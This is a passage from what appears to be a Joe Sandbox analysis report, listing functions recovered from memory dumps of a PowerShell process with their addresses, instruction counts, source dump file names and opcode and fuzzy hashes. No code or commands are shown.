                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b322bb9841fcc33a88c5b57ffd742cad585d52b384bc42f3c9482b5ad36a89ec
                                                                    • Instruction ID: cc3be8828a3c03f38cc5fa2ca919f89e83460f18b9ac3b56df4d4edf7d3a16f2
                                                                    • Opcode Fuzzy Hash: b322bb9841fcc33a88c5b57ffd742cad585d52b384bc42f3c9482b5ad36a89ec
                                                                    • Instruction Fuzzy Hash: 34417B74A00605CFCB19CF49C598AAEFBB1FF48310B158599D915AB3A4C732FC95CBA0
                                                                    Function 04B0C388 Relevance: .1, Instructions: 101COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6dcd870629b9b7a62d4a92a33cbbce2c274e38d84d5c9be5253b17f3c8e43ce6
                                                                    • Instruction ID: 9c38a927d09020f2ecfde5f4e88249626fb4cd5e1f7188a546cee6e3966322f5
                                                                    • Opcode Fuzzy Hash: 6dcd870629b9b7a62d4a92a33cbbce2c274e38d84d5c9be5253b17f3c8e43ce6
                                                                    • Instruction Fuzzy Hash: 7931C2353002019FD708DB78D854B9EBBA6EFC4311F14966DD209CB392DFB5A805C7A0
                                                                    Function 04B06FB9 Relevance: .1, Instructions: 99COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d1d5fc95ade22da5f09dbb14d64bbec3e80cf6e0f284890b1737fc5729abfe77
                                                                    • Instruction ID: 34b7a5736cc50cdae6ad1dfe961784a233b32d7f599e0aa31c0e1bd4ad2bbbe1
                                                                    • Opcode Fuzzy Hash: d1d5fc95ade22da5f09dbb14d64bbec3e80cf6e0f284890b1737fc5729abfe77
                                                                    • Instruction Fuzzy Hash: E131C734B001058FDB14DFA4C598AAABBF6EF8D315F1481A9E506AB391EF31ED41DB60
                                                                    Function 04B0AE60 Relevance: .1, Instructions: 91COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fc904f06c3415878188323f4508f60af23331fbe4a5c791181ee98bd185a0e20
                                                                    • Instruction ID: ff81b3f8e92493a8d03b8216e305a624efc8efdb1f173d23f67868ae73021493
                                                                    • Opcode Fuzzy Hash: fc904f06c3415878188323f4508f60af23331fbe4a5c791181ee98bd185a0e20
                                                                    • Instruction Fuzzy Hash: D1317A70E002098FDB04DFB9D494BAEBFF2EF89301F158469E505EB291EB709C418B50
                                                                    Function 04B0AD28 Relevance: .1, Instructions: 86COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 683651c1ccd7148fab28e97d480c7bb9951aeb7668ba483c2e61852166bf0e07
                                                                    • Instruction ID: 589eefded560f109019c65b6154277e9b081f1dc37f8b8b797d2501787af5f98
                                                                    • Opcode Fuzzy Hash: 683651c1ccd7148fab28e97d480c7bb9951aeb7668ba483c2e61852166bf0e07
                                                                    • Instruction Fuzzy Hash: 0C3170B8A012459FEB04DBB4D854AEE7BB2EFC5300F2584A9D115AF395DB74AD01CFA0
                                                                    Function 04B0E049 Relevance: .1, Instructions: 84COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3c623e83c1cf60d1e78422046d209ebdaf19c82e142c615d36dcbeeccc3669d6
                                                                    • Instruction ID: b562d34d9b8b71491ea2c96e98b70f190c50f94158fc2522f6959c38e326fd69
                                                                    • Opcode Fuzzy Hash: 3c623e83c1cf60d1e78422046d209ebdaf19c82e142c615d36dcbeeccc3669d6
                                                                    • Instruction Fuzzy Hash: 7B311A35A002048FCB18DF68D498AAEBBB2EF89315F1445ADD406AB3A1DB70AC41CB90
                                                                    Function 04B0AE70 Relevance: .1, Instructions: 84COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ca7bb385d877a88b669a9360fd6b86b4bdc8d4feaccfe1da828cd3aac977bf57
                                                                    • Instruction ID: dd8d25bd1c30c07427370ebc2fa323e46ce718f1e199652094ac2a46ce0ba382
                                                                    • Opcode Fuzzy Hash: ca7bb385d877a88b669a9360fd6b86b4bdc8d4feaccfe1da828cd3aac977bf57
                                                                    • Instruction Fuzzy Hash: B3314970A002099FDF04DFA9C4947AEBEF6EF89301F159469E505EB391EF74AC418B60
                                                                    Function 04B0AF98 Relevance: .1, Instructions: 81COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b603123287c139abba770a1e330c0b064a6b6177e6b0cae0c1a39f8db8974632
                                                                    • Instruction ID: b10e6c825ba3351a2248ec0c9489ad5ed3eeeb1c971b3b45a22f1c9459e67f51
                                                                    • Opcode Fuzzy Hash: b603123287c139abba770a1e330c0b064a6b6177e6b0cae0c1a39f8db8974632
                                                                    • Instruction Fuzzy Hash: 6F218975A043488FCB14DFAED840B9EBFF5EB89320F24846AD109A7350DA75A905CBA5
                                                                    Function 04B0E058 Relevance: .1, Instructions: 77COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4096b639a8357586134e5912043ff0728c3ab802beb4068d1238bb890d5022c5
                                                                    • Instruction ID: 62a999afc7e834f4caad680f3903a25b754df68656c63129ed49ba6cc401a0e2
                                                                    • Opcode Fuzzy Hash: 4096b639a8357586134e5912043ff0728c3ab802beb4068d1238bb890d5022c5
                                                                    • Instruction Fuzzy Hash: F9312774A002059FCB28DF68D498A9EBBF6EF88315F148569D406EB390DB70AC81CB90
                                                                    Function 04B0AD38 Relevance: .1, Instructions: 77COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7503f86d818c5ad4d3e9d3faf888f9d99d28cf526f881662451dc57bffdb8f42
                                                                    • Instruction ID: 2a51f01b6dbb9277c3ee4af74241224f3341182c46a09b8414ede6c2ae9af013
                                                                    • Opcode Fuzzy Hash: 7503f86d818c5ad4d3e9d3faf888f9d99d28cf526f881662451dc57bffdb8f42
                                                                    • Instruction Fuzzy Hash: EA3112B8A012099FDB44EBA4D854AEE7BB7EFC4300F2184A9D515AB394DF75ED018F90
                                                                    Function 030BF3D8 Relevance: .1, Instructions: 76COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2350242370.00000000030BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 030BD000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_30bd000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 32f5a4ae98db6d3c91bc48eea0588cef59c5b6826c710023ddb929ec87ce309e
                                                                    • Instruction ID: dee40d8904fafea930ab760ab3058d60c76813aec8a2736b09dd4a18ce4abaf3
                                                                    • Opcode Fuzzy Hash: 32f5a4ae98db6d3c91bc48eea0588cef59c5b6826c710023ddb929ec87ce309e
                                                                    • Instruction Fuzzy Hash: B7212476508301EFCB05DF10D9C0B2ABBB5FB88314F24C9ADE9090B656C776C456CBA1
                                                                    Function 04B093F0 Relevance: .1, Instructions: 76COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f0848bebee14265c2dde727da34ace55550c00eba641eb5827af59447546e011
                                                                    • Instruction ID: cdfae185864d50d15c176ea4674c4e7ecbdeae2d75e95887df28f4ba2abcfa93
                                                                    • Opcode Fuzzy Hash: f0848bebee14265c2dde727da34ace55550c00eba641eb5827af59447546e011
                                                                    • Instruction Fuzzy Hash: A5318BB59057448EDB60CF6AC08879AFFF2EF89320F28C09ED45E9B256D674A441CB61
                                                                    Function 030BF02C Relevance: .1, Instructions: 72COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2350242370.00000000030BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 030BD000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_30bd000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b6c448f2525da9b35bce3c60edf584304aded669560f92e6c7f623134180cff9
                                                                    • Instruction ID: 10f343ac28c9766efa3ce8dc0d841a5efc6beeb7bd02244796e703e4a4046001
                                                                    • Opcode Fuzzy Hash: b6c448f2525da9b35bce3c60edf584304aded669560f92e6c7f623134180cff9
                                                                    • Instruction Fuzzy Hash: 70216475504201EFCB14DF24CDC0B6ABBB5FB84324F24C9ADD90A0B262C77AD846CA61
                                                                    Function 04B09400 Relevance: .1, Instructions: 69COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3da042c21693638fb61fb3c06d329822efc0e5d11e7c581b5e4e01066b459683
                                                                    • Instruction ID: 5c946f3f15602a70b78597598b0ac5a733d052215f7fd397ecd46e58b7349049
                                                                    • Opcode Fuzzy Hash: 3da042c21693638fb61fb3c06d329822efc0e5d11e7c581b5e4e01066b459683
                                                                    • Instruction Fuzzy Hash: 03214BB59057448EDB60CF6AC08838EFFF6EF89320F28C45ED45D97296D674A4418B61
                                                                    Function 075D197D Relevance: .1, Instructions: 64COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2382211808.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_75d0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: dc114ca93c4b41f329565e05f1a669047992d1d4ab0825d7a61a31896c5abedc
                                                                    • Instruction ID: 3ff968937d5411bf27b0f51bb0aa0f7cac60532ddc83bdce42c6e84d73ef2201
                                                                    • Opcode Fuzzy Hash: dc114ca93c4b41f329565e05f1a669047992d1d4ab0825d7a61a31896c5abedc
                                                                    • Instruction Fuzzy Hash: 2A218EB1A10A0ADFDB30CF9DC540BEABBF2BB45251F468067E9048B652D734DD85C7A1
                                                                    Function 04B07664 Relevance: .1, Instructions: 62COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 66da9527a86197b27c9a67b7a59c3b10d3cc25c9ec280fa022497f182d9f1782
                                                                    • Instruction ID: 360a791b60bd0840272931a7f661adf35c0ac2bd16a4220fcd65443d0d0e1a49
                                                                    • Opcode Fuzzy Hash: 66da9527a86197b27c9a67b7a59c3b10d3cc25c9ec280fa022497f182d9f1782
                                                                    • Instruction Fuzzy Hash: B711EC397001188FDB04DFACE8849DDBBF6EFC8255B1540A5E609DB355DB31ED158BA0
                                                                    Function 075D1990 Relevance: .1, Instructions: 58COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2382211808.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_75d0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 77d493bf0212bd2fe7c4f4750eb74189438aef652dcaf2264eee3ee547458112
                                                                    • Instruction ID: 8bf1d7c9c860a2055182260f3a0303753cecd269ed31ad42201b03c381058234
                                                                    • Opcode Fuzzy Hash: 77d493bf0212bd2fe7c4f4750eb74189438aef652dcaf2264eee3ee547458112
                                                                    • Instruction Fuzzy Hash: C51182F1A00A0ADFDB30CF9DC544BEAB7E2BB45251F468167D5048B212DB35DD85CB91
                                                                    Function 030BF3D3 Relevance: .1, Instructions: 57COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2350242370.00000000030BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 030BD000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_30bd000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 226763f8ebee4a326c53d81c1b8fbc9c4432138e5169b0b621e51b23af87bf07
                                                                    • Instruction ID: c50786c26b7e075a313ce14125815fa6005566b4902e2ddd3c953ce1ce56bc68
                                                                    • Opcode Fuzzy Hash: 226763f8ebee4a326c53d81c1b8fbc9c4432138e5169b0b621e51b23af87bf07
                                                                    • Instruction Fuzzy Hash: D7218C76504241DFCB06CF10D9C4B56BFB2FB88314F28C5A9D9494B666C33AD46ACB91
                                                                    Function 030BF027 Relevance: .1, Instructions: 53COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2350242370.00000000030BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 030BD000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_30bd000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1baa4135a3ffa84b7eafa0616a1ffb5636ea4d9d3a95b2124a7f7c9932413226
                                                                    • Instruction ID: f5ec4a52838dab063f65ce630cccfbf46ba5debbe2c9cfd7b44dad5cffa0aad4
                                                                    • Opcode Fuzzy Hash: 1baa4135a3ffa84b7eafa0616a1ffb5636ea4d9d3a95b2124a7f7c9932413226
                                                                    • Instruction Fuzzy Hash: 1111D079505280CFCB11CF14D9C0B55FFB1FB44314F28C6A9D8094B666C33AD44ACB51
                                                                    Function 04B0BCE0 Relevance: .1, Instructions: 52COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 973f0b092d33ca5059fbeebd814909c03ef3f64b8a380ce51667f921dd250b99
                                                                    • Instruction ID: be4ed63bab31fda5d7b1ccd867ae50e90923b085a8ba47987c96d5d8479c2564
                                                                    • Opcode Fuzzy Hash: 973f0b092d33ca5059fbeebd814909c03ef3f64b8a380ce51667f921dd250b99
                                                                    • Instruction Fuzzy Hash: F711C0356087849FDB28CB79C594A967FF0EF46210F1884EED08ACB6A2CB21F845D701
                                                                    Function 04B0E774 Relevance: .1, Instructions: 51COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 38c246778a05e30593d15b01f3fae51e3bc02cbe52ae50777afd21ed18312c02
                                                                    • Instruction ID: 1d50754c66744c43ca2364c1dc29b82815a4329826a1f1bdd13b48625e8fbaf4
                                                                    • Opcode Fuzzy Hash: 38c246778a05e30593d15b01f3fae51e3bc02cbe52ae50777afd21ed18312c02
                                                                    • Instruction Fuzzy Hash: 9901DE3290D3C19EDB12CBBCD8A2795BF749F57224F0A02EAC042AB1A3C6542406D721
                                                                    Function 04B079AA Relevance: .0, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fcac144c03709627d7844bb302e3012bd7c7b8811a631f8883f94ff8e1fa758a
                                                                    • Instruction ID: cc0142f572f7c0b12034fd5e9cb2f3a41c40cd7b72146a9b87c9d03a1ec46992
                                                                    • Opcode Fuzzy Hash: fcac144c03709627d7844bb302e3012bd7c7b8811a631f8883f94ff8e1fa758a
                                                                    • Instruction Fuzzy Hash: D701D4313042449FDB55CF68D850A6EBFF5EB8921571045AEE109DB681DE31BC01C750
                                                                    Function 04B0DE98 Relevance: .0, Instructions: 48COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f31b5ba564d07fca037ed3283d4ca5178d88ac68cb762bd7a086bbd739391167
                                                                    • Instruction ID: b01f3459f1d14c027e8bb20b5a31273453bceffea31afbc29738ed139462e7b9
                                                                    • Opcode Fuzzy Hash: f31b5ba564d07fca037ed3283d4ca5178d88ac68cb762bd7a086bbd739391167
                                                                    • Instruction Fuzzy Hash: 890152357012149FCF119FB4E8486AEBBF6FB89315F14446EE51AD3342DB316911CB91
                                                                    Function 04B0DFD0 Relevance: .0, Instructions: 48COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bbf331d6cebc1006054c8770d252bc708d8b7a9943c126d65e83e840e50b2256
                                                                    • Instruction ID: f13ec58781e19e62e897c8bbc08099e906d7ccc04d9363300b4ef49d8f2f0f01
                                                                    • Opcode Fuzzy Hash: bbf331d6cebc1006054c8770d252bc708d8b7a9943c126d65e83e840e50b2256
                                                                    • Instruction Fuzzy Hash: 7B11F3342047548FC729DF75D09089ABBF6EF8931536089ADD48A8BBA0DB32E845CB50
                                                                    Function 030BD006 Relevance: .0, Instructions: 47COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2350242370.00000000030BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 030BD000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_30bd000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 09e49baa0914be51553fb80455976918fb0836b253b64545e3a2552b2d18a600
                                                                    • Instruction ID: b69e2d0ab9ff26b559dbe4402d7dc9551316c9faeca663e4a60c4b19338f9321
                                                                    • Opcode Fuzzy Hash: 09e49baa0914be51553fb80455976918fb0836b253b64545e3a2552b2d18a600
                                                                    • Instruction Fuzzy Hash: C5016D7140E3C09FD7128B258C84792BFB8DF43224F0984CBE9888F1A3C2695C45C772
                                                                    Function 04B0DCD9 Relevance: .0, Instructions: 47COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ad4b5697c3548e806f99d480bc2b12115663fadbd3c13f23b25f070c574bedb5
                                                                    • Instruction ID: e870c1526cfe6f0e0a17f00c3d5f1c382a5974c2c691d9093220173b010ec48e
                                                                    • Opcode Fuzzy Hash: ad4b5697c3548e806f99d480bc2b12115663fadbd3c13f23b25f070c574bedb5
                                                                    • Instruction Fuzzy Hash: 0C01D635B081449FCF05DBB4E4949FD7FB5EF89212B1884EED4069B3D2DA316805DB60
                                                                    Function 04B0BF10 Relevance: .0, Instructions: 46COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 95d3669a4e555fde1edee976984e62ed9d970bb0ffe57d8a0f7f71d292400dce
                                                                    • Instruction ID: e9801726b5a9ed41cd0547ac05c6299fe42ddba0ba9aa61cc2e60a92e4f1003f
                                                                    • Opcode Fuzzy Hash: 95d3669a4e555fde1edee976984e62ed9d970bb0ffe57d8a0f7f71d292400dce
                                                                    • Instruction Fuzzy Hash: 940186317092945FD705CB799CA4AB77FE9DF9A61071440AAF984C7262CA71DD00C760
                                                                    Function 030BD01D Relevance: .0, Instructions: 45COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2350242370.00000000030BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 030BD000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_30bd000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1d6e00eebfd4b7a6041fa3bb5492e69a26fda1ec005b36f4daf78bd62019e62d
                                                                    • Instruction ID: 8f1a70f1104ead69834df7d217dac906487847f6c137768a8c1f89f29cc4c141
                                                                    • Opcode Fuzzy Hash: 1d6e00eebfd4b7a6041fa3bb5492e69a26fda1ec005b36f4daf78bd62019e62d
                                                                    • Instruction Fuzzy Hash: 9001A2714063449AE750CE25CD84BAAFFE8DF81764F1CC45AEE494A252CAB99841CAB1
                                                                    Function 04B07940 Relevance: .0, Instructions: 41COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 93b87e1f17e438ecf002d29ff278b5a7b8266cfac2566cbd1ba5940158d93b56
                                                                    • Instruction ID: e6d06b866d903e4e484edd63240eb68cc9826521689b98bcad564db46d166421
                                                                    • Opcode Fuzzy Hash: 93b87e1f17e438ecf002d29ff278b5a7b8266cfac2566cbd1ba5940158d93b56
                                                                    • Instruction Fuzzy Hash: CCF0F631305280AFDB15DB65D8949AF7BF9EFCA62171009AEE04AC7B91DE346C41C761
                                                                    Function 04B090D8 Relevance: .0, Instructions: 39COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a82ad3b0599ea24cee162502d0a97dd5f5ef66a500884d868d97a87f168a0c51
                                                                    • Instruction ID: e56931b8f69b4a258ed24b4cd559038fccca95dabc79f4617a244049c698028e
                                                                    • Opcode Fuzzy Hash: a82ad3b0599ea24cee162502d0a97dd5f5ef66a500884d868d97a87f168a0c51
                                                                    • Instruction Fuzzy Hash: E1018C3AA092804FD715DB78D0547EB7BA1EFC3318F25819EC4564B292CF356806DBA1
                                                                    Function 030BD9A7 Relevance: .0, Instructions: 37COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2350242370.00000000030BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 030BD000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_30bd000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: eb23f95c1a88493633b6a3f1648450dad4a4bcba036a5c000912f663d96832f4
                                                                    • Instruction ID: 683981e0e918993fc14c63f1368d207ae11190a93bc847a83c256eb4e35a35fa
                                                                    • Opcode Fuzzy Hash: eb23f95c1a88493633b6a3f1648450dad4a4bcba036a5c000912f663d96832f4
                                                                    • Instruction Fuzzy Hash: 30F0F976600604AFD760CF0AD985C67FBBDEBD4670719C56AE84A4B611C671EC41CAA0
                                                                    Function 04B0DE38 Relevance: .0, Instructions: 34COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 05f7d2084d171741ecfec3c1df351999cae4332b77e66a75070663d28c9ce988
                                                                    • Instruction ID: de83c1cc7366299fa1a331808f69392dc66e3aa4fe8ba9f1b9328450bc9190e5
